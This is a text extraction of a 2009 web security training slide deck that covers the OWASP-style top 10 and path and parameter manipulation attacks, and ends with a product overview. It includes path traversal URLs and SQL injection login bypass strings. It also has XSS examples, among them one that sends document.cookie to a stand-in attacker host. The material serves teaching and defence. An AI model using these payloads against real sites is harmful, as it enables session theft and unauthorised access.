web security overview lohika asc team 2009 [email protected]

Web Security Overview


Lohika ASC team 2009 [email protected]

2

Agenda


The Evolution of Web Applications ……………...................3

Common Web Application Functions ………………………..5

Server/Browser Information Flow and Vulnerabilities ……...6

The Security Aspects ………………………………………….8

Web Security Assessment Main Stages……………………10

Web Application Vulnerabilities - Top 10……………………14

Path Manipulation Attack …………………………………….21

Parameter Manipulation Attack ……………………………..25

ASC Products Overview ………………………………….…36

3


Ea

rly

da

ys o

f In

tern

et • Web sites were static docs

• One-way information flow: Server -> Browser

• No authentication/authorization• Low interest for malicious intruders:

no sensitive information stored, everything in public view

• Typically attackers modified the files to deface the site

• Attackers used the server’s storage and bandwidth to distribute “warez” C

urr

en

t da

ys

• The majority of site are web applications

• Web applications rely on two-way information flow: Server <-> Browser

• Web applications are different and complicated:• Different technologies• Registration• Login• Financial transactions• Web search• Authoring of content by users• Content generated on fly• Content tailored to specific user =>

Security is a big issue!

The Evolution of Web Applications

4

Rapid evolution of web applications:

No longer a set of static pages

Rely on multiple tech layers and concepts to provide interactive content Replacing desktop applications in many areas

Are used everywhere

Web Security Overview The Evolution

of Web Applications

5


2. Shopping

1. Social Networking

5. Banking

8 .Web Search

3. Auctions

7 .Gambling

6 .Web logs

4. Web mail

9. Interactive information

Common Web Application Functions

Potenti

al l

y Not

Secure

For an example: My Space – Samy Wormhttp://namb.la/popular/tech.html

http://namb.la/popular/tech.html




6


Browser

FirewallHTTP Server

Auth ServiceWeb Service

Database

Browser

External User

Internal User

Internal HTTP Server

Server Infrastructure

Two-way information flow: Server Browser

7


Browser

External User

FirewallHTTP Server

Auth ServiceWeb Service

Database

Browser

Internal User

Internal HTTP Server

Server Infrastructure

XML Injection

Path Traversal

SQL Injection

ParameterTampering

Forged TokenXSS

CSRF

Local File Include

Remote File Inclusion

Two-way information flow: Server Browser

8


Application security sometimes gets overlooked by Dev, QA or Operations teams for various reasons:

• Risks involved are underestimated / not fully realized

• Lack of competence

• Lack of time

Any business that relies on a vulnerable web application is potentially at risk of having a major business impact with serious implications.

The Security Aspect In recent years, Web application security has

become a focal center for security experts. Application attacks are constantly on the rise, posing new risks for the organization.

9


This is a problem

The Security Aspect

10

Web Security Assessment main stages


11

Web Security Overview Map the Application’s

content

1.1 Explore visible content

1.2 Consult public

resources

1 Linked Content

2.1 Discover hidden content

2.2 Discover default content

2 Other Content

3.1 Identifier-specified functions

3.2 Debug parameters

3 Non-standard access

methods

12


Analyze the Application

1. Identify functionality

2. Identify data entry points

3. Identify technologies

Attack Vectors

13

Web Security Overview Attack patterns and goals

14


InjectionExamples of injection flaws are SQL, XML, LDAP, HTTP header injection (cookies, requests), and OS command injectionsAttacks occur when untrusted data, such as a query, command or argument, is sent to an interpreterVulnerable applications can be tricked into executing unintended commands or allowing the attacker to access, and modify, data

Cross Site ScriptingThere are three types of XSS attacks: stored, reflected, and Dom basedXSS attacks occur when an application allows data that is not validated or escaped properly to be sent to a web browserMalicious scripts are executed in the victim’s browser allowing the attacker to hijack the user’s session, steal cookies, deface web sites, redirect users to malicious web sites, and remote browser control

Web Application Vulnerabilities Top 10

15


Broken Authentication and Session ManagementUsers are impersonated due to leaks or flaws in the authentication processAttacks occur when a session ID is visible to others, timeouts are not properly set, SSL/TLS is not used, or any other flaw in the authentication scheme is detectedFlaws used against one account may be replicated against an account with higher privileges

Insecure Direct Object ReferencesAttack occurs when an authorized user can change a parameter value that refers to a system object that they are not authorized forAlmost any reference that can be reached by URL to include: references to files, paths, database keys, reflection by class name (e.g. JDBC connector class)Remote referencing includes: Web Services, CORBA, RMI, RPC


(Continued)

16


Cross Site Request Forgery (CSRF)Attacker creates malicious code to generate a forged request that the attacker tricks the victim into submittingForged requests can be hidden in image tags, XSS attacks and a number of other techniquesCSRF attacks can complete any transactions that the victim is permitted to perform such as access data, transfer funds or make purchases

Security MisconfigurationAttacker exploits unsecured pages, default accounts, unpatched flaws or any other vulnerability that could have be addressed by proper configurationThese attacks can result in a complete system compromise


(Continued)

17


Failure to Restrict URL AccessThis attack takes place when an authorized user can simply change a URL to access a privileged pageAttackers generally look for administrative functions to employ this attack onLinks can be obtained from: hidden fields, client-side code, robots.txt, configuration files, static XML files, directory access

Unvalidated Redirects and ForwardsUnvalidated parameter allows an attacker to choose a destination page where they wish to send a victim to trick them into disclosing private informationVictims trust these links because the link is to a valid site


(Continued)

18


Insecure Cryptographic StorageThe most common reason for this attack is that data that should be encrypted is stored in cleartextCan result from the poor use of encryption algorithms such as using home grown algorithms, insecure use of strong algorithms or the continued use of proven weak algorithmsThe use of weak or unsalted hashes to protect passwords is another common flaw that leads to this risk

Insufficient Transport Layer ProtectionMost commonly, this attack occurs when a site does not use SSL/TLS for pages that require authentication where an attacker can monitor network traffic to steal an authenticated user’s session cookiePoorly configured SSL certificates can lull a user into accepting warnings for legitimate sites only to be tricked into accepting a phishing site’s certificateAttacks can lead to account theft, phishing attacks and admin accounts being compromised


(Continued)

19

Path Manipulation attacks andParameter Manipulation attacks


20

One of the most dangerous and most common attack techniques are:


Path manipulation:

Directory Indexing

Path Traversal

Predictable resource location

Path Truncation

Parameter manipulation:

Abnormal input

Brute Force Authentication

Attack

SQL Injection

SOAP Injection

Command Execution

Cross Site Scripting

(XSS)

Attack Techniques

21

Path manipulation: 1. Directory Indexing

Directory Indexing

Backup files

Temporary files

Hidden files

Naming conventions

Configuration file contents

Script Contents

Automatic directory listing/indexing is a web server function that lists all of the files within a requested directory.

The following information could be obtained based on directory indexing data:

Note: if directory contain(index.html/home.html/default.htm) the normal base file is not present.


22

Example:

1.Given the following URLhttp://www.site.com/folder1/folder2/file.asp

2.truncating the path to look forhttp://www.site.com/folder1/folder2/

3.andhttp://www.site.com/folder1/

may cause the webserver to reveal directory contents or to cause unhandled exceptions.

Path truncation attacks are requests for known directories without filenames.

This may cause directory listings to be displayed

Path manipulation: 2. Path Truncation


23

Path manipulation: 3. Path Traversal

These attacks are expressions in the URI that will cause the Web server to display the

contents of files above the webroot

Example:

1.Given the following URLhttp://www.site.com/folder1/../../../../../../../boot.ini

2.Or following http://www.site.com/getnews.php?name=../../../../../../boot.ini

it can occurs while web application uses the string to specify a file location without first completely parsing out traversal characters


24

Path manipulation: 4. Predictable Resource location. Directory enumeration

Directory enumeration lists all directory paths and possibilities on the application server,

including hidden directories that could possibly contain sensitive information


25

HTTP GET request with query parameters

HTTP POST request with parameters

HTTP Cookies

Custom HTTP headers

Web Security Overview Parameter manipulation:

Where can we find the Entry Points of web application?

26

Parameter manipulation: 1. Abnormal input.

parameter overflow

Abnormal input attack strings are composed of characters that can cause unhandled exceptions.

Unhandled exceptions often cause error messages to be displayed that disclose sensitive information about the application’s internal mechanics.

Source code may even be disclosed

Example:

1.Given the following URLhttp://www.site.com/cgi-bin/process.pl?id=%00 (where %00 is poisonous null byte )

2.Or following http://www.site.com/cgi-bin/process.pl?id=99999999999999999


27

Parameter manipulation:2. Brute Force authentication

attack.

.

The brute force attack is a method of obtaining a user's authentication credentials application’s internal mechanics.

Using brute force, attackers attempt combinations of the accepted character set in order to find a specific combination that gains access to the authorized area


28

Parameter manipulation: 3. SQL injectionSimple injection with ‘OR true’ construction:

Identify the availability of SQL injection use Incorrectly filtered escape characters:This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. This results in the potential manipulation of the statementsperformed on the database by the end user of the application.

Example: ?login=aaa' (get error: You have an error in your SQL syntax…)

?login=aaa‘ OR 1=1 OR ‘bbb (use “or 1=1” signatures)

SQL query: SELECT ìd`,`login`,`pass` FROM ùsers` WHERE login=‘aaa’ OR 1=1 OR ‘bbb’ AND pass=‘qwert’;

Example:SQL query: SELECT ìd`,`login`,`pass` FROM ùsers` WHERE login=‘admin‘ AND pass=‘qwert’;


29

Parameter manipulation: 3. SQL injection


30

Example:

1.Given the following URLhttp://www.site.com/login.php?name=Vlad&password=12345

2. After login the “Welcome Vlad to our site” message appears on the site page

3. What happens if user name will be following:http://www.site.com/login.php?name=anyuser’ OR 1=1 --&password=unknown

4. of course - SQL query: SELECT `id`,`login`,`pass` FROM `users` WHERE login=‘anyuser’ OR 1=1 --’ AND pass=‘unknown’;

5. You are logged under anyuser !!!


3. SQL injection

31


User (is a victim)

User (is a victim)

User (is a victim)

popular Web Portal(forum,gallery,livejournal,etc..)

Code injection into client-side (web browser)

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users.

Parameter manipulation: 5. Cross Site Scripting

32


Simple XSS Attack

http://myserver.com/test.jsp?name=Stefan

Example:

<HTML>

<Body> Welcome Stefan </Body>

</HTML>


33


http://myserver.com/welcome.jsp?name=<script>alert("Attacked")</script>

<HTML>

<Body>

Welcome <script>alert("Attacked")</script>

</Body>

</HTML>


34

Example:

6.Try to login under following user name:http://www.site.com/login.php?name=<script>alert(111);</script>’ OR ‘1=1#&password=…

7. After login the “Welcome <script>alert(111);</script>’ OR ‘1=1# to our site” message appears in html source of this page. As a result, The popup message box with “111” appears – it is XXS !!!

8. What happens if user name will be following: <script>alert(document.cookies);</script>’ OR =‘1 9. And what happens if user name will be following: <script> document.writeln("<img src=http://myhackersite.com/?a=" + document.cookie + ">“ ); </script>’ OR 1=1#


5. Cross Site Scripting

35

ASC Products Overview


36

Application Security Center Product Overview

WebInspect

QAInspect

Assessment Management Platform (AMP)


37

Web Security Overview Security Center Product

Overview – Entire SuiteSecurityInspect

SecurityInspect

SecurityInspect

38

Q. A.

?


web security overview lohika asc team 2009 [email protected]

Documents